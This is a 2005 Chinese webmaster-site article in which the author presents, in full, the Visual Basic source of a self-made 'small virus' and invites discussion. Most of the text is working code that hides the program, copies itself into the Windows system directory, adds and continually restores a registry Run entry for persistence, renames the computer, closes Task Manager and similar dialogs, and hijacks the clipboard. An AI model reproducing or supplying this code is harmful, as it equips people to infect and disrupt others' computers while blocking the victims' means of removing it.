|
 |
资料搜索 |
|
|
|
|
|
|
|
|
相关文章 |
|
|
|
|
|
|
|
|
|
|
| [ 来源:中国站长学院 | 作者:无从考证 | 时间:2005-8-22 12:46:44 | 浏览:人次 ] | |
|
大虾们,你们好!今天我无聊时做了一个简单的病毒!希望和大家讨论讨论!
这病毒的功能如下
1 运行时隐藏起来
2 自我复制到系统目录下
3 WIN启动时自我运行
5 不准重复打开这个程序
4 程序运行时不能打开任务管理器,QQ等!
6 计算机名称改变
7 每次粘贴时,出现的是“我是甯王我怕谁,我爱你!”
首先介绍一下要用到的API吧(只说功能)
GetForegroundWindow 获得前台窗口的句柄
GetClassName 为指定的窗口取得类名
PostMessage 将一条消息投递到指定窗口的消息队列
GetWindowText 取得一个窗体的标题文字
SetComputerName 设置新的计算机名
GetSystemDirectory 取得Windows系统目录
GetWindow 获得一个窗口的句柄
ShowWindow 控制窗口的可见性
RegOpenKey 打开一个现有的注册表项
RegQueryValueEx 获取一个项的设置值
RegSetValueEx 设置指定项的值
RegCloseKey 关闭系统注册表中的一个项
然后开始编写!
1添加一个: Module1模块
Option Explicit
’声明API
Public Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long ' Note that if you declare the lpData parameter as String, you must pass it By Value.
Public Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Public Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Public Declare Function RegQueryValueEx Lib "advapi32.dll" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, lpData As Any, lpcbData As Long) As Long
Public Declare Function GetCursorPos Lib "user32" (lpPoint As POINTAPI) As Long
Public Declare Function GetForegroundWindow Lib "user32" () As Long
Public Declare Function GetClassName Lib "user32" Alias "GetClassNameA" (ByVal hwnd As Long, ByVal lpClassName As String, ByVal nMaxCount As Long) As Long
Public Declare Function PostMessage Lib "user32" Alias "PostMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
Public Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long
Public Declare Function SetComputerName Lib "kernel32" Alias "SetComputerNameA" (ByVal lpComputerName As String) As Long
Public Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Public Declare Function GetWindow Lib "user32" (ByVal hwnd As Long, ByVal wCmd As Long) As Long
Public Declare Function ShowWindow Lib "user32" (ByVal hwnd As Long, ByVal nCmdShow As Long) As Long
’声明常量
Public Const HKEY_LOCAL_MACHINE = &H80000002
Public Const GW_OWNER = 4
Public Const SW_HIDE = 0
’在写一个修改注册表的子过程
Public Sub regedit(strPath As String, strKey As String, strValue As String)
Dim l As Long
Dim s As String
Dim s1 As String
Dim n As Long
Dim keyhand As Long
s = String(255, Chr(0))
s1 = String(255, Chr(0))
n = 255
l = RegOpenKey(HKEY_LOCAL_MACHINE, strPath, keyhand)
If l = 0 Then 是否打开
l = RegQueryValueEx(keyhand, strKey, 0, 1, ByVal s, 255)
If l <> 0 Then 是否也有
l = RegSetValueEx(keyhand, strKey, 0, 1, ByVal strValue, LenB(strValue))
’修改注册表
End If
End If
l = RegCloseKey(keyhand)
’关闭
End Sub
2 回到FORM1双击窗休:
Option Explicit
Dim systempath As String
选择LOAD事件
Private Sub Form_Load()
Dim K As Long
'不准重复打开这个程序
Dim title As String
If App.PrevInstance Then
title = App.title
App.title = ""
Me.Caption = ""
AppActivate title
End
End If
'--------------
'得到系统的系统目录
systempath = String(255, Chr(0))
GetSystemDirectory systempath, 254
systempath = Left(systempath, InStr(systempath, Chr(0)) - 1)
'自我复制到系统目录
If Not Dir(systempath & "\" & "liuning.exe") = "liuning.exe" Then
FileCopy App.Path & "\" & App.EXEName & ".exe", systempath & "\" & "liuning.exe"
End If
'自动运行
regedit "SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "甯王小病毒", systempath & "\" & "liuning" & ".exe"
'计算机改名
SetComputerName "QQ122273014"
'隐藏
K = GetWindow(Me.hwnd, GW_OWNER)
ShowWindow K, SW_HIDE
Timer1.Enabled = True
Me.Hide
End Sub
再添加一个TIME1控件
Private Sub Timer1_Timer()
'重点
Dim K As Long
Dim s As String
Dim s1 As String
Static n As Long
s = Space(19)
s1 = Space(19)
'得到句柄
K = GetForegroundWindow
'得到类名
GetClassName K, s, 20
'查看当前程序的标题
GetWindowText K, s1, 20
'打开的是QQ或是其它类名是#32770时关闭
If Left(s, 6) = "#32770" Then
' 打开的是WIN管理器
If Left(s1, 7) = "Windows" Then
PostMessage K, &H10, 0&, 0& ’关闭程序
Exit Sub
End If
n = n + 1
If n >= 40 Then
PostMessage K, &H10, 0&, 0& ’关闭程序
n = 0
End If
End If
'认用户粘贴时就会出现
Clipboard.Clear
Clipboard.SetText "我是甯王我怕谁,我爱你!"
'不准删除注册表里的信息
regedit "SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "甯王小病毒", systempath & "\" & "liuning" & ".exe"
End Sub
|
|
|
|
|
|
特别声明: 本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载,但请务必注明出处和原始作者。文章版权归文章原始作者所有。对于被本站转载文章的个人和网站,我们表示深深的谢意。如果本站转载的文章有版权问题请联系编辑人员,我们尽快予以更正。 |
|
|
|
|
|
栏目编辑: 设计风 |
责任编辑: 郁郁小蝎 |
|
|
原始作者: 无从考证 |
录入时间: 2005-8-22 12:46:44 |
|
|
信息来源: 中国站长学院 |
投稿信箱: Edu#chinaz.com |
|
|
|
| |
|
设为首页
加入收藏
总编信箱
投稿或申请专栏请先 [登 陆]
